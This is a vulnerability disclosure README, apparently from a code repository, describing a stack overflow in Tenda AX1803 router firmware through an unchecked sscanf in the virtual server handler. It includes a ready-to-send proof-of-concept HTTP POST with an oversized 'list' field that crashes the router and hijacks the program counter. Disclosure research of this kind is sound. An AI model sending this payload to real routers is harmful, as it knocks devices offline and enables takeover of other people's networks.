Skip to content

Latest commit

 

History

History

1

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
img
img
 
 
readme.md
readme.md
 
 

readme.md

Tenda AX1803 (V1.0.0.1) has a stack overflow vulnerability

Overview

Product Information

Tenda AX1803 V1.0.0.1, the latest version of simulation overview:

image-20220724213031606

Vulnerability details

The Tenda AX1803 (V1.0.0.1) was found to have a stack overflow vulnerability in the formSetVirtualSer function. An attacker can obtain a stable root shell through a carefully constructed payload.

image-20220804202859967

In the formSetVirtualSer function, v2 (the value of list) we entered will be passed into the sub_89D3C function as a parameter, and this function has stack overflow.

image-20220805012624084

In the sub_89D3C function,the a2 (the value of list) is formatted using the _isoc99_sscanf function and in the form of %[^,]%*c%[^,]%*c%[^,]%*c%s. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of sv12v13 or v14, it will cause a stack overflow.

Recurring vulnerabilities and POC

In order to reproduce the vulnerability, the following steps can be followed:

  1. Boot the firmware by qemu-system or other ways (real machine)
  2. Attack with the following POC attacks
POST /goform/SetVirtualServerCfg HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 336
Origin: http://192.168.0.1
DNT: 1
Connection: close
Referer: http://192.168.0.1/index.html
Cookie: ecos_pw=eee:language=cn

list=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,b,c,d~

image-20220804202006797

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

image-20220804235435725

As shown in the figure above, we can hijack PC registers.

image-20220724220055672

Finally, you also can write exp to get a stable root shell.